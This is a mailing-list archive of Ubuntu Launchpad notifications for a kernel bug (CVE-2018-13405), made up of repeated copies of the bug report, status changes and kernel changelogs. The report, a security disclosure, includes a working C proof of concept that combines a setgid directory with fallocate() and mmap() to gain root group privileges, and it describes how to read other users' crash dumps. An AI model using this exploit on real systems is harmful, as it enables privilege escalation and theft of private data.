[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
** Changed in: linux (Ubuntu Cosmic) Status: In Progress => Won't Fix ** Changed in: linux (Ubuntu) Status: In Progress => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1779923 Title: other users' coredumps can be read via setgid directory and killpriv bypass Status in linux package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Released Status in linux source package in Xenial: Fix Released Status in linux source package in Bionic: Fix Released Status in linux source package in Cosmic: Won't Fix Bug description: Note: I am both sending this bug report to secur...@kernel.org and filing it in the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug or as a Ubuntu bug. You may wish to talk to each other to determine the best place to fix this. I noticed halfdog's old writeup at https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ , describing essentially the following behavior in combination with a trick for then writing to the resulting file without triggering the killpriv logic: = user@debian:~/sgid_demo$ sudo mkdir -m03777 dir user@debian:~/sgid_demo$ cat > demo.c #include int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); } user@debian:~/sgid_demo$ gcc -o demo demo.c user@debian:~/sgid_demo$ ./demo user@debian:~/sgid_demo$ ls -l dir/file -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file = Two patches for this were proposed on LKML back then: "[PATCH 1/2] fs: Check f_cred instead of current's creds in should_remove_suid()" https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/ "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory" https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/ However, as far as I can tell, neither of them actually landed. You can also bypass the killpriv logic with fallocate() and mmap() - fallocate() permits resizing the file without triggering killpriv, mmap() permits writing without triggering killpriv (the mmap part is mentioned at https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/ ): = user@debian:~/sgid_demo$ sudo mkdir -m03777 dir user@debian:~/sgid_demo$ cat fallocate.c #define _GNU_SOURCE #include #include #include #include #include #include #include int main(void) { int src_fd = open("/usr/bin/id", O_RDONLY); if (src_fd == -1) err(1, "open 2"); struct stat src_stat; if (fstat(src_fd, _stat)) err(1, "fstat"); int src_len = src_stat.st_size; char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0); if (src_mapping == MAP_FAILED) err(1, "mmap 2"); int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755); if (fd == -1) err(1, "open"); if (fallocate(fd, 0, 0, src_len)) err(1, "fallocate"); char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (mapping == MAP_FAILED) err(1, "mmap"); memcpy(mapping, src_mapping, src_len); munmap(mapping, src_len); close(fd); close(src_fd); execl("./dir/file", "id", NULL); err(1, "execl"); } user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c user@debian:~/sgid_demo$ ./fallocate uid=1000(user) gid=1000(user) egid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user) = sys_copy_file_range() also looks as if it bypasses killpriv on supported filesystems, but I haven't tested that one so far. On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and contains group-readable crashdumps in some custom format, so you can use this issue to steal other users' crashdumps: = user@ubuntu-18-04-vm:~$ ls -l /var/crash total 296 -rw-r- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash -rw-r- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash -rw-r- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash -rw-r- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash -rw-r- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash cat: /var/crash/_usr_bin_id.0.crash: Permission denied user@ubuntu-18-04-vm:~$ cat fallocate.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include int main(int argc, char **argv) { if (argc != 2) {
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 3.13.0-157.207 --- linux (3.13.0-157.207) trusty; urgency=medium * linux: 3.13.0-157.207 -proposed tracker (LP: #1787982) * CVE-2017-5715 (Spectre v2 retpoline) - SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps" * CVE-2017-2583 - KVM: x86: fix emulation of "MOV SS, null selector" * CVE-2017-7518 - KVM: x86: fix singlestepping over syscall * CVE-2017-18270 - KEYS: prevent creating a different user's keyrings * Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181) - Documentation: Document array_index_nospec - array_index_nospec: Sanitize speculative array de-references - x86: Implement array_index_mask_nospec - x86: Introduce barrier_nospec - x86/get_user: Use pointer masking to limit speculation - x86/syscall: Sanitize syscall table de-references under speculation - vfs, fdtable: Prevent bounds-check bypass via speculative execution - nl80211: Sanitize array index in parse_txq_params - x86/spectre: Report get_user mitigation for spectre_v1 - x86/kvm: Update spectre-v1 mitigation - nospec: Allow index argument to have const-qualified type - nospec: Move array_index_nospec() parameter checking into separate macro - nospec: Kill array_index_nospec_mask_check() - SAUCE: Replace osb() calls with array_index_nospec() - SAUCE: Rename osb() to barrier_nospec() - SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h * Prevent speculation on user controlled pointer (LP: #1775137) - x86: reorganize SMAP handling in user space accesses - x86: fix SMAP in 32-bit environments - x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec - x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end} - x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec * CVE-2016-10208 - ext4: validate s_first_meta_bg at mount time - ext4: fix fencepost in s_first_meta_bg validation * CVE-2018-10323 - xfs: set format back to extents if xfs_bmap_extents_to_btree * CVE-2017-16911 - usbip: prevent vhci_hcd driver from leaking a socket pointer address * CVE-2018-13406 - video: uvesafb: Fix integer overflow in allocation * CVE-2018-10877 - ext4: verify the depth of extent tree in ext4_find_extent() * CVE-2018-10881 - ext4: clear i_data in ext4_inode_info when removing inline data * CVE-2018-1092 - ext4: fail ext4_iget for root directory if unallocated * CVE-2018-1093 - ext4: fix block bitmap validation when bigalloc, ^flex_bg - ext4: add validity checks for bitmap block numbers * CVE-2018-12233 - jfs: Fix inconsistency between memory allocation and ea_buf->max_size * CVE-2017-16912 - usbip: fix stub_rx: get_pipe() to validate endpoint number * CVE-2018-10675 - mm/mempolicy: fix use after free when calling get_mempolicy * CVE-2017-8831 - saa7164: fix sparse warnings - saa7164: fix double fetch PCIe access condition * CVE-2017-16533 - HID: usbhid: fix out-of-bounds bug * CVE-2017-16538 - media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner - media: dvb-usb-v2: lmedm04: Improve logic checking of warm start * CVE-2017-16644 - hdpvr: Remove deprecated create_singlethread_workqueue - media: hdpvr: Fix an error handling path in hdpvr_probe() * CVE-2017-16645 - Input: ims-psu - check if CDC union descriptor is sane * CVE-2017-5549 - USB: serial: kl5kusb105: fix line-state error handling * CVE-2017-16532 - usb: usbtest: fix NULL pointer dereference * CVE-2017-16537 - media: imon: Fix null-ptr-deref in imon_probe * CVE-2017-11472 - ACPICA: Add additional debug info/statements - ACPICA: Namespace: fix operand cache leak * CVE-2017-16643 - Input: gtco - fix potential out-of-bound access * CVE-2017-16531 - USB: fix out-of-bounds in usb_set_configuration * CVE-2018-10124 - kernel/signal.c: avoid undefined behaviour in kill_something_info * CVE-2017-6348 - irda: Fix lockdep annotations in hashbin_delete(). * CVE-2017-17558 - USB: core: prevent malicious bNumInterfaces overflow * CVE-2017-5897 - ip6_gre: fix ip6gre_err() invalid reads * CVE-2017-6345 - SAUCE: import sock_efree() - net/llc: avoid BUG_ON() in skb_orphan() * CVE-2017-7645 - nfsd: check for oversized NFSv2/v3 arguments * CVE-2017-9984 - ALSA: msnd: Optimize / harden DSP and MIDI loops * CVE-2018-1000204 - scsi: sg: allocate with __GFP_ZERO in sg_build_indirect() * CVE-2018-10021 - scsi: libsas: defer ata device eh commands to libata * CVE-2017-16914 - usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer * CVE-2017-16913 - usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input * CVE-2017-16535 - USB: core: fix out-of-bounds access bug in
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 4.4.0-134.160 --- linux (4.4.0-134.160) xenial; urgency=medium * linux: 4.4.0-134.160 -proposed tracker (LP: #1787177) * locking sockets broken due to missing AppArmor socket mediation patches (LP: #1780227) - UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets * Backport namespaced fscaps to xenial 4.4 (LP: #1778286) - Introduce v3 namespaced file capabilities - commoncap: move assignment of fs_ns to avoid null pointer dereference - capabilities: fix buffer overread on very short xattr - commoncap: Handle memory allocation failure. * Xenial update to 4.4.140 stable release (LP: #1784409) - usb: cdc_acm: Add quirk for Uniden UBC125 scanner - USB: serial: cp210x: add CESINEL device ids - USB: serial: cp210x: add Silicon Labs IDs for Windows Update - n_tty: Fix stall at n_tty_receive_char_special(). - staging: android: ion: Return an ERR_PTR in ion_map_kernel - n_tty: Access echo_* variables carefully. - x86/boot: Fix early command-line parsing when matching at end - ath10k: fix rfc1042 header retrieval in QCA4019 with eth decap mode - i2c: rcar: fix resume by always initializing registers before transfer - ipv4: Fix error return value in fib_convert_metrics() - kprobes/x86: Do not modify singlestep buffer while resuming - nvme-pci: initialize queue memory before interrupts - netfilter: nf_tables: use WARN_ON_ONCE instead of BUG_ON in nft_do_chain() - ARM: dts: imx6q: Use correct SDMA script for SPI5 core - ubi: fastmap: Correctly handle interrupted erasures in EBA - mm: hugetlb: yield when prepping struct pages - tracing: Fix missing return symbol in function_graph output - scsi: sg: mitigate read/write abuse - s390: Correct register corruption in critical section cleanup - drbd: fix access after free - cifs: Fix infinite loop when using hard mount option - jbd2: don't mark block as modified if the handle is out of credits - ext4: make sure bitmaps and the inode table don't overlap with bg descriptors - ext4: always check block group bounds in ext4_init_block_bitmap() - ext4: only look at the bg_flags field if it is valid - ext4: verify the depth of extent tree in ext4_find_extent() - ext4: include the illegal physical block in the bad map ext4_error msg - ext4: clear i_data in ext4_inode_info when removing inline data - ext4: add more inode number paranoia checks - ext4: add more mount time checks of the superblock - ext4: check superblock mapped prior to committing - HID: i2c-hid: Fix "incomplete report" noise - HID: hiddev: fix potential Spectre v1 - HID: debug: check length before copy_to_user() - x86/mce: Detect local MCEs properly - x86/mce: Fix incorrect "Machine check from unknown source" message - media: cx25840: Use subdev host data for PLL override - mm, page_alloc: do not break __GFP_THISNODE by zonelist reset - dm bufio: avoid sleeping while holding the dm_bufio lock - dm bufio: drop the lock when doing GFP_NOIO allocation - mtd: rawnand: mxc: set spare area size register explicitly - dm bufio: don't take the lock in dm_bufio_shrink_count - mtd: cfi_cmdset_0002: Change definition naming to retry write operation - mtd: cfi_cmdset_0002: Change erase functions to retry for error - mtd: cfi_cmdset_0002: Change erase functions to check chip good only - netfilter: nf_log: don't hold nf_log_mutex during user access - staging: comedi: quatech_daqp_cs: fix no-op loop daqp_ao_insn_write() - Linux 4.4.140 * Xenial update to 4.4.139 stable release (LP: #1784382) - xfrm6: avoid potential infinite loop in _decode_session6() - netfilter: ebtables: handle string from userspace with care - ipvs: fix buffer overflow with sync daemon and service - atm: zatm: fix memcmp casting - net: qmi_wwan: Add Netgear Aircard 779S - net/sonic: Use dma_mapping_error() - Revert "Btrfs: fix scrub to repair raid6 corruption" - tcp: do not overshoot window_clamp in tcp_rcv_space_adjust() - Btrfs: make raid6 rebuild retry more - usb: musb: fix remote wakeup racing with suspend - bonding: re-evaluate force_primary when the primary slave name changes - tcp: verify the checksum of the first data segment in a new connection - ext4: update mtime in ext4_punch_hole even if no blocks are released - ext4: fix fencepost error in check for inode count overflow during resize - driver core: Don't ignore class_dir_create_and_add() failure. - btrfs: scrub: Don't use inode pages for device replace - ALSA: hda - Handle kzalloc() failure in snd_hda_attach_pcm_stream() - ALSA: hda: add dock and led support for HP EliteBook 830 G5 - ALSA: hda: add dock and led support for HP ProBook 640 G4 - cpufreq: Fix new policy initialization during limits updates via
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
This bug was fixed in the package linux - 4.15.0-33.36 --- linux (4.15.0-33.36) bionic; urgency=medium * linux: 4.15.0-33.36 -proposed tracker (LP: #1787149) * RTNL assertion failure on ipvlan (LP: #1776927) - ipvlan: drop ipv6 dependency - ipvlan: use per device spinlock to protect addrs list updates - SAUCE: fix warning from "ipvlan: drop ipv6 dependency" * ubuntu_bpf_jit test failed on Bionic s390x systems (LP: #1753941) - test_bpf: flag tests that cannot be jited on s390 * HDMI/DP audio can't work on the laptop of Dell Latitude 5495 (LP: #1782689) - drm/nouveau: fix nouveau_dsm_get_client_id()'s return type - drm/radeon: fix radeon_atpx_get_client_id()'s return type - drm/amdgpu: fix amdgpu_atpx_get_client_id()'s return type - platform/x86: apple-gmux: fix gmux_get_client_id()'s return type - ALSA: hda: use PCI_BASE_CLASS_DISPLAY to replace PCI_CLASS_DISPLAY_VGA - vga_switcheroo: set audio client id according to bound GPU id * locking sockets broken due to missing AppArmor socket mediation patches (LP: #1780227) - UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets * Update2 for ocxl driver (LP: #1781436) - ocxl: Fix page fault handler in case of fault on dying process * netns: unable to follow an interface that moves to another netns (LP: #1774225) - net: core: Expose number of link up/down transitions - dev: always advertise the new nsid when the netns iface changes - dev: advertise the new ifindex when the netns iface changes * [Bionic] Disk IO hangs when using BFQ as io scheduler (LP: #1780066) - block, bfq: fix occurrences of request finish method's old name - block, bfq: remove batches of confusing ifdefs - block, bfq: add requeue-request hook * HP ProBook 455 G5 needs mute-led-gpio fixup (LP: #1781763) - ALSA: hda: add mute led support for HP ProBook 455 G5 * [Bionic] bug fixes to improve stability of the ThunderX2 i2c driver (LP: #1781476) - i2c: xlp9xx: Fix issue seen when updating receive length - i2c: xlp9xx: Make sure the transfer size is not more than I2C_SMBUS_BLOCK_SIZE * x86/kvm: fix LAPIC timer drift when guest uses periodic mode (LP: #1778486) - x86/kvm: fix LAPIC timer drift when guest uses periodic mode * Please include ax88179_178a and r8152 modules in d-i udeb (LP: #1771823) - [Config:] d-i: Add ax88179_178a and r8152 to nic-modules * Nvidia fails after switching its mode (LP: #1778658) - PCI: Restore config space on runtime resume despite being unbound * Kernel error "task zfs:pid blocked for more than 120 seconds" (LP: #1781364) - SAUCE: (noup) zfs to 0.7.5-1ubuntu16.3 * CVE-2018-12232 - PATCH 1/1] socket: close race condition between sock_close() and sockfs_setattr() * CVE-2018-10323 - xfs: set format back to extents if xfs_bmap_extents_to_btree * change front mic location for more lenovo m7/8/9xx machines (LP: #1781316) - ALSA: hda/realtek - Fix the problem of two front mics on more machines - ALSA: hda/realtek - two more lenovo models need fixup of MIC_LOCATION * Cephfs + fscache: unable to handle kernel NULL pointer dereference at IP: jbd2__journal_start+0x22/0x1f0 (LP: #1783246) - ceph: track read contexts in ceph_file_info * Touchpad of ThinkPad P52 failed to work with message "lost sync at byte" (LP: #1779802) - Input: elantech - fix V4 report decoding for module with middle key - Input: elantech - enable middle button of touchpads on ThinkPad P52 * xhci_hcd :00:14.0: Root hub is not suspended (LP: #1779823) - usb: xhci: dbc: Fix lockdep warning - usb: xhci: dbc: Don't decrement runtime PM counter if DBC is not started * CVE-2018-13406 - video: uvesafb: Fix integer overflow in allocation * CVE-2018-10840 - ext4: correctly handle a zero-length xattr with a non-zero e_value_offs * CVE-2018-11412 - ext4: do not allow external inodes for inline data * CVE-2018-10881 - ext4: clear i_data in ext4_inode_info when removing inline data * CVE-2018-12233 - jfs: Fix inconsistency between memory allocation and ea_buf->max_size * CVE-2018-12904 - kvm: nVMX: Enforce cpl=0 for VMX instructions * Error parsing PCC subspaces from PCCT (LP: #1528684) - mailbox: PCC: erroneous error message when parsing ACPI PCCT * CVE-2018-13094 - xfs: don't call xfs_da_shrink_inode with NULL bp * other users' coredumps can be read via setgid directory and killpriv bypass (LP: #1779923) // CVE-2018-13405 - Fix up non-directory creation in SGID directories * Invoking obsolete 'firmware_install' target breaks snap build (LP: #1782166) - snapcraft.yaml: stop invoking the obsolete (and non-existing) 'firmware_install' target * snapcraft.yaml: missing ubuntu-retpoline-extract-one script breaks the build (LP: #1782116) - snapcraft.yaml: copy
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
** No longer affects: whoopsie (Ubuntu) ** No longer affects: whoopsie (Ubuntu Trusty) ** No longer affects: whoopsie (Ubuntu Xenial) ** No longer affects: whoopsie (Ubuntu Bionic) ** No longer affects: whoopsie (Ubuntu Cosmic) -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1779923 Title: other users' coredumps can be read via setgid directory and killpriv bypass Status in linux package in Ubuntu: In Progress Status in linux source package in Trusty: In Progress Status in linux source package in Xenial: In Progress Status in linux source package in Bionic: In Progress Status in linux source package in Cosmic: In Progress Bug description: Note: I am both sending this bug report to secur...@kernel.org and filing it in the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug or as a Ubuntu bug. You may wish to talk to each other to determine the best place to fix this. I noticed halfdog's old writeup at https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ , describing essentially the following behavior in combination with a trick for then writing to the resulting file without triggering the killpriv logic: = user@debian:~/sgid_demo$ sudo mkdir -m03777 dir user@debian:~/sgid_demo$ cat > demo.c #include int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); } user@debian:~/sgid_demo$ gcc -o demo demo.c user@debian:~/sgid_demo$ ./demo user@debian:~/sgid_demo$ ls -l dir/file -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file = Two patches for this were proposed on LKML back then: "[PATCH 1/2] fs: Check f_cred instead of current's creds in should_remove_suid()" https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/ "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory" https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/ However, as far as I can tell, neither of them actually landed. You can also bypass the killpriv logic with fallocate() and mmap() - fallocate() permits resizing the file without triggering killpriv, mmap() permits writing without triggering killpriv (the mmap part is mentioned at https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/ ): = user@debian:~/sgid_demo$ sudo mkdir -m03777 dir user@debian:~/sgid_demo$ cat fallocate.c #define _GNU_SOURCE #include #include #include #include #include #include #include int main(void) { int src_fd = open("/usr/bin/id", O_RDONLY); if (src_fd == -1) err(1, "open 2"); struct stat src_stat; if (fstat(src_fd, _stat)) err(1, "fstat"); int src_len = src_stat.st_size; char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0); if (src_mapping == MAP_FAILED) err(1, "mmap 2"); int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755); if (fd == -1) err(1, "open"); if (fallocate(fd, 0, 0, src_len)) err(1, "fallocate"); char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (mapping == MAP_FAILED) err(1, "mmap"); memcpy(mapping, src_mapping, src_len); munmap(mapping, src_len); close(fd); close(src_fd); execl("./dir/file", "id", NULL); err(1, "execl"); } user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c user@debian:~/sgid_demo$ ./fallocate uid=1000(user) gid=1000(user) egid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user) = sys_copy_file_range() also looks as if it bypasses killpriv on supported filesystems, but I haven't tested that one so far. On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and contains group-readable crashdumps in some custom format, so you can use this issue to steal other users' crashdumps: = user@ubuntu-18-04-vm:~$ ls -l /var/crash total 296 -rw-r- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash -rw-r- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash -rw-r- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash -rw-r- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash -rw-r- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash cat: /var/crash/_usr_bin_id.0.crash: Permission denied user@ubuntu-18-04-vm:~$ cat fallocate.c #define _GNU_SOURCE #include #include #include #include #include #include #include
[Group.of.nepali.translators] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass
I don't think the Security or Foundations teams plan to make any changes in Whoopsie so I'm marking these tasks as invalid. ** Changed in: whoopsie (Ubuntu Trusty) Status: New => Invalid ** Changed in: whoopsie (Ubuntu Xenial) Status: New => Invalid ** Changed in: whoopsie (Ubuntu Bionic) Status: New => Invalid ** Changed in: whoopsie (Ubuntu Cosmic) Status: New => Invalid -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1779923 Title: other users' coredumps can be read via setgid directory and killpriv bypass Status in linux package in Ubuntu: In Progress Status in whoopsie package in Ubuntu: Invalid Status in linux source package in Trusty: In Progress Status in whoopsie source package in Trusty: Invalid Status in linux source package in Xenial: In Progress Status in whoopsie source package in Xenial: Invalid Status in linux source package in Bionic: In Progress Status in whoopsie source package in Bionic: Invalid Status in linux source package in Cosmic: In Progress Status in whoopsie source package in Cosmic: Invalid Bug description: Note: I am both sending this bug report to secur...@kernel.org and filing it in the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug or as a Ubuntu bug. You may wish to talk to each other to determine the best place to fix this. I noticed halfdog's old writeup at https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ , describing essentially the following behavior in combination with a trick for then writing to the resulting file without triggering the killpriv logic: = user@debian:~/sgid_demo$ sudo mkdir -m03777 dir user@debian:~/sgid_demo$ cat > demo.c #include int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); } user@debian:~/sgid_demo$ gcc -o demo demo.c user@debian:~/sgid_demo$ ./demo user@debian:~/sgid_demo$ ls -l dir/file -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file = Two patches for this were proposed on LKML back then: "[PATCH 1/2] fs: Check f_cred instead of current's creds in should_remove_suid()" https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/ "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory" https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/ However, as far as I can tell, neither of them actually landed. You can also bypass the killpriv logic with fallocate() and mmap() - fallocate() permits resizing the file without triggering killpriv, mmap() permits writing without triggering killpriv (the mmap part is mentioned at https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/ ): = user@debian:~/sgid_demo$ sudo mkdir -m03777 dir user@debian:~/sgid_demo$ cat fallocate.c #define _GNU_SOURCE #include #include #include #include #include #include #include int main(void) { int src_fd = open("/usr/bin/id", O_RDONLY); if (src_fd == -1) err(1, "open 2"); struct stat src_stat; if (fstat(src_fd, _stat)) err(1, "fstat"); int src_len = src_stat.st_size; char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0); if (src_mapping == MAP_FAILED) err(1, "mmap 2"); int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755); if (fd == -1) err(1, "open"); if (fallocate(fd, 0, 0, src_len)) err(1, "fallocate"); char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (mapping == MAP_FAILED) err(1, "mmap"); memcpy(mapping, src_mapping, src_len); munmap(mapping, src_len); close(fd); close(src_fd); execl("./dir/file", "id", NULL); err(1, "execl"); } user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c user@debian:~/sgid_demo$ ./fallocate uid=1000(user) gid=1000(user) egid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user) = sys_copy_file_range() also looks as if it bypasses killpriv on supported filesystems, but I haven't tested that one so far. On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and contains group-readable crashdumps in some custom format, so you can use this issue to steal other users' crashdumps: = user@ubuntu-18-04-vm:~$ ls -l /var/crash total 296 -rw-r- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash -rw-r- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash -rw-r- 1 user whoopsie 51842 Jun 25